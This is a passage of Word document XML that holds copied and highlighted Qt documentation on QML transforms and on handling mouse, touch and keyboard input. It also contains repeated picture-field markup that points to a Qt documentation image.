        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-uses-visual-transforms.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="002B6E64">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00CF4C26">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00CF4C26">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-uses-visual-transforms.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00CF4C26">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-uses-visual-transforms.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0061520D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="0061520D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-uses-visual-transforms.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="0061520D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-uses-visual-transforms.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00395997">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00395997">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-uses-visual-transforms.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00395997">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B75670">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00B75670">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-uses-visual-transforms.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00B75670">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"http://doc.qt.io/qt-5/images/qml-uses-visual-transforms.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-transforms.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-transforms.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-transforms.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-transforms.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-transforms.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-transforms.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-transforms.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-transforms.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-transforms.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-transforms.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-transforms.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-transforms.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-transforms.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-transforms.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-transforms.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-transforms.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-transforms.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-transforms.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-transforms.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-transforms.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-transforms.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-transforms.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-transforms.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002230B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1030" type="#_x0000_t75" alt="" style="width:194.1pt;height:115.2pt">
            <v:imagedata r:id="rId469" r:href="rId470"/>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00B75670">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00395997">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="0061520D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00CF4C26">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="002B6E64">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00112022" w:rsidRPr="00112022" w:rsidRDefault="00112022" w:rsidP="00112022">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>For more complex transformations, see the</w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId471" w:anchor="transform-prop" w:history="1">
        <w:r w:rsidRPr="00112022">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>I</w:t>
        </w:r>
        <w:r w:rsidRPr="0048415B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>tem::transform</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00112022" w:rsidRPr="00112022" w:rsidRDefault="00112022" w:rsidP="00CD6118">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="0048415B" w:rsidRDefault="00490E7E" w:rsidP="00CD6118">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId472" w:history="1">
        <w:r w:rsidR="005A6BBD" w:rsidRPr="0048415B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://qt-project.org/doc/qt-5.1/qtdoc/qtquick-usecase-userinput.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0048415B" w:rsidRPr="0048415B" w:rsidRDefault="0048415B" w:rsidP="00507851">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="615" w:name="_Toc483000661"/>
      <w:bookmarkStart w:id="616" w:name="_Toc483003678"/>
      <w:bookmarkStart w:id="617" w:name="_Toc483604014"/>
      <w:bookmarkStart w:id="618" w:name="_Toc483605234"/>
      <w:r w:rsidRPr="00507851">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Use Case - Responding To User Input in QML</w:t>
      </w:r>
      <w:bookmarkEnd w:id="615"/>
      <w:bookmarkEnd w:id="616"/>
      <w:bookmarkEnd w:id="617"/>
      <w:bookmarkEnd w:id="618"/>
    </w:p>
    <w:p w:rsidR="0048415B" w:rsidRPr="0048415B" w:rsidRDefault="0048415B" w:rsidP="00507851">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="619" w:name="supported-types-of-user-input"/>
      <w:bookmarkStart w:id="620" w:name="_Toc483000662"/>
      <w:bookmarkStart w:id="621" w:name="_Toc483003679"/>
      <w:bookmarkStart w:id="622" w:name="_Toc483604015"/>
      <w:bookmarkStart w:id="623" w:name="_Toc483605235"/>
      <w:bookmarkEnd w:id="619"/>
      <w:r w:rsidRPr="00507851">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Supported Types of User Input</w:t>
      </w:r>
      <w:bookmarkEnd w:id="620"/>
      <w:bookmarkEnd w:id="621"/>
      <w:bookmarkEnd w:id="622"/>
      <w:bookmarkEnd w:id="623"/>
    </w:p>
    <w:p w:rsidR="0048415B" w:rsidRPr="0048415B" w:rsidRDefault="0048415B" w:rsidP="0048415B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId473" w:history="1">
        <w:r w:rsidRPr="00D72F99">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">module provides support for the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>most common types</w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of user input, including </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mouse and touch events</w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>text input and key-press events</w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Other modules provide support for other types of user input (for example, the</w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId474" w:history="1">
        <w:r w:rsidRPr="00D72F99">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Sensors</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>module provides support for shake-gestures in QML applications).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0048415B" w:rsidRPr="0048415B" w:rsidRDefault="0048415B" w:rsidP="0048415B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This article covers </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>how to handle basic user input</w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; for further information about motion-gesture support, please see the</w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId475" w:history="1">
        <w:r w:rsidRPr="00D72F99">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Sensors</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>documentation</w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. For information about </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>audio-visual input</w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, please see the</w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId476" w:history="1">
        <w:r w:rsidRPr="00D72F99">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Multimedia</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>documentation</w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0048415B" w:rsidRPr="0048415B" w:rsidRDefault="0048415B" w:rsidP="00507851">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="624" w:name="mouse-and-touch-events"/>
      <w:bookmarkStart w:id="625" w:name="_Toc483000663"/>
      <w:bookmarkStart w:id="626" w:name="_Toc483003680"/>
      <w:bookmarkStart w:id="627" w:name="_Toc483604016"/>
      <w:bookmarkStart w:id="628" w:name="_Toc483605236"/>
      <w:bookmarkEnd w:id="624"/>
      <w:r w:rsidRPr="00507851">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mouse and Touch Events</w:t>
      </w:r>
      <w:bookmarkEnd w:id="625"/>
      <w:bookmarkEnd w:id="626"/>
      <w:bookmarkEnd w:id="627"/>
      <w:bookmarkEnd w:id="628"/>
    </w:p>
    <w:p w:rsidR="0048415B" w:rsidRPr="0048415B" w:rsidRDefault="0048415B" w:rsidP="0048415B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
